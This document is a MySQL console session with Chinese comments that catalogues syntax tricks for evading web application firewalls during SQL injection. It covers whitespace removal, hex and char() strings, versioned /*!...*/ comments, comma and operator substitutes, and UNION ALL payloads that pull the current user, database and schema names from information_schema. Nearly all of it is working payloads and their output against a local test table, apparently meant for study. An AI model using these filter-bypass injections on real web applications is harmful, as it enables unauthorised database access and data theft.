mysql> select'id', id, name,3e0from students;  #去除空格
+----+----+--------+-----+
| id | id | name   | 3e0 |
+----+----+--------+-----+
| id |  1 | Tiger  |   3 |
| id |  2 | Tina   |   3 |
| id |  3 | Felica |   3 |
+----+----+--------+-----+
3 rows in set (0.00 sec)
mysql> select(count(3))from(students); #括号分割
+------------+
| (count(3)) |
+------------+
|          3 |
+------------+
1 row in set (0.00 sec)
mysql> select  #换行分割
    -> count(3)
    -> from
    -> students;
+----------+
| count(3) |
+----------+
|        3 |
+----------+
1 row in set (0.00 sec)
mysql> select name from students where name like 0x5425; #十六进制表示字符串
+-------+
| name  |
+-------+
| Tiger |
| Tina  |
+-------+
2 rows in set (0.00 sec)
mysql> select name from students where name like char(84,37); #使用char函数表示字符串
+-------+
| name  |
+-------+
| Tiger |
| Tina  |
+-------+
2 rows in set (0.00 sec)
mysql> select '10'*3e0; #'10'会被转换为整形然后乘以3最后乘以10^0
+----------+
| '10'*3e0 |
+----------+
|       30 |
+----------+
1 row in set (0.00 sec)

mysql> select '100'*3e1;
+-----------+
| '100'*3e1 |
+-----------+
|      3000 |
+-----------+
1 row in set (0.00 sec)

mysql> select '100'*3e2;
+-----------+
| '100'*3e2 |
+-----------+
|     30000 |
+-----------+
1 row in set (0.00 sec)

mysql> select /*!**/ from students; #使用/*!*/逃逸
+----+--------+--------+------+
| id | name   | gender | age  |
+----+--------+--------+------+
|  1 | Tiger  | male   |   27 |
|  2 | Tina   | female |   28 |
|  3 | Felica | female |   26 |
+----+--------+--------+------+
3 rows in set (0.00 sec)

mysql> select /*!* from*/ students;
+----+--------+--------+------+
| id | name   | gender | age  |
+----+--------+--------+------+
|  1 | Tiger  | male   |   27 |
|  2 | Tina   | female |   28 |
|  3 | Felica | female |   26 |
+----+--------+--------+------+
3 rows in set (0.00 sec)

mysql> select /*!* from students*/;
+----+--------+--------+------+
| id | name   | gender | age  |
+----+--------+--------+------+
|  1 | Tiger  | male   |   27 |
|  2 | Tina   | female |   28 |
|  3 | Felica | female |   26 |
+----+--------+--------+------+
3 rows in set (0.00 sec)

mysql> /*!select * from students*/;
+----+--------+--------+------+
| id | name   | gender | age  |
+----+--------+--------+------+
|  1 | Tiger  | male   |   27 |
|  2 | Tina   | female |   28 |
|  3 | Felica | female |   26 |
+----+--------+--------+------+
3 rows in set (0.00 sec)

mysql> select-id+1-1 from students;
+---------+
| -id+1-1 |
+---------+
|      -1 |
|      -2 |
|      -3 |
+---------+
3 rows in set (0.00 sec)

mysql> select-id+1-1.from students;
+----------+
| -id+1-1. |
+----------+
|       -1 |
|       -2 |
|       -3 |
+----------+
3 rows in set (0.00 sec)

mysql> /*!50000select*/ id from students; #50000版本号
+----+
| id |
+----+
|  1 |
|  2 |
|  3 |
+----+
3 rows in set (0.00 sec)

mysql> select `version`();
+-------------+
| `version`() |
+-------------+
| 8.0.21      |
+-------------+
1 row in set (0.00 sec)

mysql> /*!60000select*/ id from students;
+----+
| id |
+----+
|  1 |
|  2 |
|  3 |
+----+
3 rows in set (0.00 sec)

mysql> /*!70000select*/ id from students;
+----+
| id |
+----+
|  1 |
|  2 |
|  3 |
+----+
3 rows in set (0.00 sec)

mysql> /*!80000select*/ id from students;
+----+
| id |
+----+
|  1 |
|  2 |
|  3 |
+----+
3 rows in set (0.00 sec)

mysql> /*!90000select*/ id from students;
ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id from students' at line 1

mysql> select-count(3)outcome from students; #可以省略as和空格
+---------+
| outcome |
+---------+
|      -3 |
+---------+
1 row in set (0.00 sec)

mysql> select/*!**/from students;
+----+--------+--------+------+
| id | name   | gender | age  |
+----+--------+--------+------+
|  1 | Tiger  | male   |   27 |
|  2 | Tina   | female |   28 |
|  3 | Felica | female |   26 |
+----+--------+--------+------+
3 rows in set (0.00 sec)

mysql> select substr(user() from 1 for 3)outcome;
+---------+
| outcome |
+---------+
| roo     |
+---------+
1 row in set (0.00 sec)

mysql> select substr(user()from 1 for 3)outcome;
+---------+
| outcome |
+---------+
| roo     |
+---------+
1 row in set (0.00 sec)

mysql> select mid(user()from 1 for 3)outcome;
+---------+
| outcome |
+---------+
| roo     |
+---------+
1 row in set (0.00 sec)

mysql> select mid(user()from 1 for 3)outcome limit 1; #使用from for来替换函数中的','
+---------+
| outcome |
+---------+
| roo     |
+---------+
1 row in set (0.00 sec)

mysql> select mid(user()from 1 for 3)outcome limit 1,1;
Empty set (0.00 sec)

mysql> select mid(user()from 1 for 3)outcome limit 1 offset 1; #使用offset替换','
Empty set (0.00 sec)

mysql> select mid(user(),1,3)outcome;  #如果使用mid函数或者substr函数则会使用','分隔符来分割参数
+---------+
| outcome |
+---------+
| roo     |
+---------+
1 row in set (0.00 sec)

mysql> select substr(user(),1,3)outcome;
+---------+
| outcome |
+---------+
| roo     |
+---------+
1 row in set (0.00 sec)


mysql> select * from students where name in ('Tiger');
+----+-------+--------+------+
| id | name  | gender | age  |
+----+-------+--------+------+
|  1 | Tiger | male   |   27 |
+----+-------+--------+------+
1 row in set (0.00 sec)

mysql> select substr(name, 1,1) in ('T') from students;
+----------------------------+
| substr(name, 1,1) in ('T') |
+----------------------------+
|                          1 |
|                          1 |
|                          0 |
+----------------------------+
3 rows in set (0.00 sec)

mysql> select strcmp(left(name,1),'T') from students;
+--------------------------+
| strcmp(left(name,1),'T') |
+--------------------------+
|                        0 |
|                        0 |
|                       -1 |
+--------------------------+
3 rows in set (0.00 sec)

mysql> select * from students where name between 'R' and 'U'; #使用between替换<>
+----+-------+--------+------+
| id | name  | gender | age  |
+----+-------+--------+------+
|  1 | Tiger | male   |   27 |
|  2 | Tina  | female |   28 |
+----+-------+--------+------+
2 rows in set (0.00 sec)

mysql> show databases; #从information_schema中的SCHEMATA表获取的信息
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| test               |
+--------------------+
5 rows in set (0.00 sec)

mysql> show tables from test; #从information_schema中的TABLES表获取的信息 
+----------------+
| Tables_in_test |
+----------------+
| students       |
+----------------+
1 row in set (0.00 sec)

mysql> show columns from test.students;  #从information_schema中的COLUMNS表获取的信息  
+--------+--------------+------+-----+---------+-------+
| Field  | Type         | Null | Key | Default | Extra |
+--------+--------------+------+-----+---------+-------+
| id     | int          | NO   | PRI | NULL    |       |
| name   | varchar(255) | YES  |     | NULL    |       |
| gender | varchar(255) | YES  |     | NULL    |       |
| age    | int          | YES  |     | NULL    |       |
+--------+--------------+------+-----+---------+-------+
4 rows in set (0.00 sec)

mysql> select 1,2 from students /*!union/**//**/all*//*!select*//*!user*/(),/*!database*/();
+----------------+------+
| 1              | 2    |
+----------------+------+
| 1              | 2    |
| 1              | 2    |
| 1              | 2    |
| 1              | 2    |
| root@localhost | test |
+----------------+------+
5 rows in set (0.00 sec)

mysql> select 1,2 from students where id=1e0union all select user(),database(); #使用科学计数法
+----------------+------+
| 1              | 2    |
+----------------+------+
| 1              | 2    |
| root@localhost | test |
+----------------+------+
2 rows in set (0.00 sec)

mysql> select 1,2 from students where id=1e0union all select+1,user(); #使用'+'
+---+----------------+
| 1 | 2              |
+---+----------------+
| 1 | 2              |
| 1 | root@localhost |
+---+----------------+
2 rows in set (0.00 sec)

mysql> select 1,2 from students where id=1e0union all select-1,user(); #使用'-'
+----+----------------+
| 1  | 2              |
+----+----------------+
|  1 | 2              |
| -1 | root@localhost |
+----+----------------+
2 rows in set (0.00 sec)

mysql> select 1,2 from students where id=1e0union all select!1,user(); #使用'!'
+---+----------------+
| 1 | 2              |
+---+----------------+
| 1 | 2              |
| 0 | root@localhost |
+---+----------------+
2 rows in set, 1 warning (0.00 sec)

mysql> select 1,2 from students where id=1e0union all select~1,user(); #使用'~'
+----------------------+----------------+
| 1                    | 2              |
+----------------------+----------------+
|                    1 | 2              |
| 18446744073709551614 | root@localhost |
+----------------------+----------------+
2 rows in set (0.00 sec)

mysql> select 1,2 from students where id=1e0union all select~1,(select user());
+----------------------+----------------+
| 1                    | 2              |
+----------------------+----------------+
|                    1 | 2              |
| 18446744073709551614 | root@localhost |
+----------------------+----------------+
2 rows in set (0.00 sec)

mysql> select 1,2 from students where id=1e0union all select~1,(select `schema_name` from information_schema.schemata limit 1);  #使用'``'
+----------------------+-------+
| 1                    | 2     |
+----------------------+-------+
|                    1 | 2     |
| 18446744073709551614 | mysql |
+----------------------+-------+
2 rows in set (0.00 sec)

mysql> select 1,2 from students where id=1e0union all select@`id`,(select `schema_name` from information_schema.schemata limit 1); #使用@``
+------------+-------+
| 1          | 2     |
+------------+-------+
| 0x31       | 2     |
| 0x         | mysql |
+------------+-------+
2 rows in set (0.00 sec)

mysql> select 1,2 from students where id=.1union all select+1,(select `schema_name` from information_schema.schemata limit 1); #使用'.'符号
+---+-------+
| 1 | 2     |
+---+-------+
| 1 | mysql |
+---+-------+
1 row in set (0.00 sec)

mysql> select 1,2 from students where id=.1union/**/ all select+1,(select `schema_name` from information_schema.schemata limit 1);
+---+-------+
| 1 | 2     |
+---+-------+
| 1 | mysql |
+---+-------+
1 row in set (0.00 sec)

mysql> select 1,2 from students where id=.1union/*.1*/ all select+1,(select `schema_name` from information_schema.schemata limit 1);
+---+-------+
| 1 | 2     |
+---+-------+
| 1 | mysql |
+---+-------+
1 row in set (0.00 sec)

mysql> select 1,2 from students where id=.1union/*.1*/ all select'1',(select `schema_name` from information_schema.schemata limit 1); #使用单引号
+---+-------+
| 1 | 2     |
+---+-------+
| 1 | mysql |
+---+-------+
1 row in set (0.00 sec)

mysql> select 1,2 from students where id=.1union/*.1*/ all select"1",(select `schema_name` from information_schema.schemata limit 1);  #使用双引号
+---+-------+
| 1 | 2     |
+---+-------+
| 1 | mysql |
+---+-------+
1 row in set (0.00 sec)



